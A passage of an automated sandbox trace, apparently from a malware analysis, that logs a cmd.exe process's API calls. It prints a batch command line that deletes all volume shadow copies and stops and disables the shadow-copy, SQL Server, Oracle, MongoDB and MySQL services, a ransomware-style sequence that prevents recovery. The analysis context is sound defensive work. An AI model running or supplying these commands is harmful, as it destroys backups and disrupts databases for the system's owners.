RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x0, lpData=0x30fe868*=0x1, lpcbData=0x30fe860*=0x1000) returned 0x2 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x0, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.193] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x9, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.194] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x4, lpData=0x30fe868*=0x9, lpcbData=0x30fe860*=0x4) returned 0x0 [0042.194] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30fe864, lpData=0x30fe868, lpcbData=0x30fe860*=0x1000 | out: lpType=0x30fe864*=0x0, lpData=0x30fe868*=0x9, lpcbData=0x30fe860*=0x1000) returned 0x2 [0042.194] RegCloseKey (hKey=0xcc) returned 0x0 [0042.194] time (in: timer=0x0 | out: timer=0x0) returned 0x5d355130 [0042.194] srand (_Seed=0x5d355130) [0042.194] GetCommandLineW () returned="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" [0042.194] malloc (_Size=0x4000) returned 0x3572700 [0042.194] GetCommandLineW () returned="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" [0042.194] malloc (_Size=0xffce) returned 0x3450048 [0042.195] ??_V@YAXPAX@Z () returned 0x30ff840 [0042.195] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3450048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0042.196] malloc (_Size=0xffce) returned 0x3460020 [0042.196] ??_V@YAXPAX@Z () returned 0x30ff614 [0042.197] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3460020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0042.197] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xbff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0042.197] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xbff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.197] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xbff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.197] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0042.197] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0042.197] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0042.197] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0042.197] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0042.197] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0042.197] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0042.197] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0042.197] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0042.197] GetProcessHeap () returned 0x3110000 [0042.197] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x31162a0) returned 1 [0042.197] GetEnvironmentStringsW () returned 0x3118340* [0042.197] GetProcessHeap () returned 0x3110000 [0042.197] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xae2) returned 0x31157c8 [0042.197] FreeEnvironmentStringsA (penv="A") returned 1 [0042.197] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xbff840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0042.198] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xbff840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0042.198] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0042.198] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0042.198] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0042.198] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0042.198] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0042.198] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0042.198] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0042.198] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0042.198] malloc (_Size=0xffce) returned 0x346fff8 [0042.198] ??_V@YAXPAX@Z () returned 0x30ff3ac [0042.198] GetProcessHeap () returned 0x3110000 [0042.198] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x38) returned 0x31162b8 [0042.198] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x346fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0042.199] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x346fff8, lpFilePart=0x30ff3f8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x30ff3f8*="Desktop") returned 0x17 [0042.199] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0042.199] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30ff178 | out: lpFindFileData=0x30ff178*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x31162f8 [0042.199] FindClose (in: hFindFile=0x31162f8 | out: hFindFile=0x31162f8) returned 1 [0042.199] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x30ff178 | out: lpFindFileData=0x30ff178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x31162f8 [0042.199] FindClose (in: hFindFile=0x31162f8 | out: hFindFile=0x31162f8) returned 1 [0042.200] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x30ff178 | out: lpFindFileData=0x30ff178*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd1f96467, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xd1f96467, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x31162f8 [0042.200] FindClose (in: hFindFile=0x31162f8 | out: hFindFile=0x31162f8) returned 1 [0042.200] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0042.200] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0042.200] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0042.200] GetProcessHeap () returned 0x3110000 [0042.200] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x31157c8) returned 1 [0042.200] GetEnvironmentStringsW () returned 0x3118e68* [0042.200] GetProcessHeap () returned 0x3110000 [0042.200] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0xb1a) returned 0x3119990 [0042.200] FreeEnvironmentStringsA (penv="=") returned 1 [0042.200] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3450048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0042.200] GetProcessHeap () returned 0x3110000 [0042.200] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x31162b8) returned 1 [0042.200] ??_V@YAXPAX@Z () returned 0x1 [0042.200] ??_V@YAXPAX@Z () returned 0x1 [0042.200] GetProcessHeap () returned 0x3110000 [0042.200] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x400e) returned 0x311a4b8 [0042.201] GetProcessHeap () returned 0x3110000 [0042.201] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x6de) returned 0x3110ae0 [0042.201] GetProcessHeap () returned 0x3110000 [0042.201] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x311a4b8) returned 1 [0042.201] GetConsoleOutputCP () returned 0x1b5 [0042.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc03850 | out: lpCPInfo=0xc03850) returned 1 [0042.240] GetUserDefaultLCID () returned 0x409 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xbff82c, cchData=8 | out: lpLCData=":") returned 2 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30ff768, cchData=128 | out: lpLCData="0") returned 2 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30ff768, cchData=128 | out: lpLCData="0") returned 2 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30ff768, cchData=128 | out: lpLCData="1") returned 2 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xbff81c, cchData=8 | out: lpLCData="/") returned 2 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xbff7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xbff778, cchData=32 | out: lpLCData="Tue") returned 4 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xbff738, cchData=32 | out: lpLCData="Wed") returned 4 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xbff6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xbff6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0042.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xbff678, cchData=32 | out: lpLCData="Sat") returned 4 [0042.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xbff638, cchData=32 | out: lpLCData="Sun") returned 4 [0042.241] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xbff80c, cchData=8 | out: lpLCData=".") returned 2 [0042.241] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xbff7f8, cchData=8 | out: lpLCData=",") returned 2 [0042.241] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0042.243] GetProcessHeap () returned 0x3110000 [0042.243] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x0, Size=0x20c) returned 0x3111210 [0042.243] GetConsoleTitleW (in: lpConsoleTitle=0x3111210, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0042.254] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0042.254] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileExW") returned 0x75ea4330 [0042.254] GetProcAddress (hModule=0x75e90000, lpProcName="IsDebuggerPresent") returned 0x75ea5930 [0042.254] GetProcAddress (hModule=0x75e90000, lpProcName="SetConsoleInputExeNameW") returned 0x74fe09d0 [0042.254] ??_V@YAXPAX@Z () returned 0x1 [0042.255] GetProcessHeap () returned 0x3110000 [0042.255] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x400a) returned 0x311a4b8 [0042.255] GetProcessHeap () returned 0x3110000 [0042.255] RtlFreeHeap (HeapHandle=0x3110000, Flags=0x0, BaseAddress=0x311a4b8) returned 1 [0042.255] GetProcessHeap () returned 0x3110000 [0042.255] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x58) returned 0x3111428 [0042.256] _wcsicmp (_String1="echo", _String2=")") returned 60 [0042.256] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0042.256] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0042.256] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0042.256] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0042.256] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0042.256] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0042.256] GetProcessHeap () returned 0x3110000 [0042.256] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x58) returned 0x3111488 [0042.256] GetProcessHeap () returned 0x3110000 [0042.256] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x12) returned 0x31114e8 [0042.256] GetProcessHeap () returned 0x3110000 [0042.256] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x12) returned 0x3111508 [0042.257] GetConsoleTitleW (in: lpConsoleTitle=0x30ff600, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0042.265] malloc (_Size=0xffce) returned 0x3462f50 [0042.265] ??_V@YAXPAX@Z () returned 0x30ff38c [0042.266] malloc (_Size=0xffce) returned 0x3472f28 [0042.266] ??_V@YAXPAX@Z () returned 0x30ff144 [0042.267] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0042.267] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0042.267] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0042.267] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0042.267] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0042.267] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0042.267] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0042.267] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0042.267] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0042.267] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0042.267] ??_V@YAXPAX@Z () returned 0x1 [0042.267] GetProcessHeap () returned 0x3110000 [0042.267] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1c) returned 0x3111528 [0042.267] GetProcessHeap () returned 0x3110000 [0042.267] RtlReAllocateHeap (Heap=0x3110000, Flags=0x0, Ptr=0x3111528, Size=0x12) returned 0x3111528 [0042.267] GetProcessHeap () returned 0x3110000 [0042.267] RtlSizeHeap (HeapHandle=0x3110000, Flags=0x0, MemoryPointer=0x3111528) returned 0x12 [0042.267] GetProcessHeap () returned 0x3110000 [0042.267] RtlAllocateHeap (HeapHandle=0x3110000, Flags=0x8, Size=0x1c) returned 0x3111550 [0042.267] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0042.267] ??_V@YAXPAX@Z () returned 0x1 [0042.268] _get_osfhandle (_FileHandle=1) returned 0x90 [0042.268] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0042.281] _get_osfhandle (_FileHandle=1) returned 0x90 [0042.281] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xc03890 | out: lpMode=0xc03890) returned 1 [0042.284] _get_osfhandle (_FileHandle=0) returned 0x8c [0042.284] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xc03894 | out: lpMode=0xc03894) returned 1 [0042.285] SetConsoleInputExeNameW () returned 0x1 [0042.285] GetConsoleOutputCP () returned 0x1b5 [0042.289] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc03850 | out: lpCPInfo=0xc03850) returned 1 [0042.289] SetThreadUILanguage (LangId=0x0) returned 0x2ee0409 [0042.294] exit (_Code=0) [0042.294] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 9 os_tid = 0xdb8 Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6874a000" os_pid = "0xcf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xcb8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x9b4 Thread: id = 5 os_tid = 0xd30 Thread: id = 6 os_tid = 0xd24 Thread: id = 7 os_tid = 0xeb8 Thread: id = 8 os_tid = 0xdb0